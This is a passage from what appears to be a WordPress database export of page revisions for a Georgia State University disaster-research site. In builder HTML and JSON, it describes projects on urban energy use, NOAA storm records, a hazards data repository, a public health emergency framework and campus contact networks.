class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-356 style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Orpheus</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:35:40','2023-09-29 14:35:40','',126,'https://gsudice.dataconn.net/?p=1455',0,'revision','',0),(1461,1,'2023-09-29 10:36:20','2023-09-29 14:36:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:36:20','2023-09-29 14:36:20','',438,'https://gsudice.dataconn.net/?p=1461',0,'revision','',0),(1462,1,'2023-09-29 10:36:20','2023-09-29 14:36:20','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n            <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 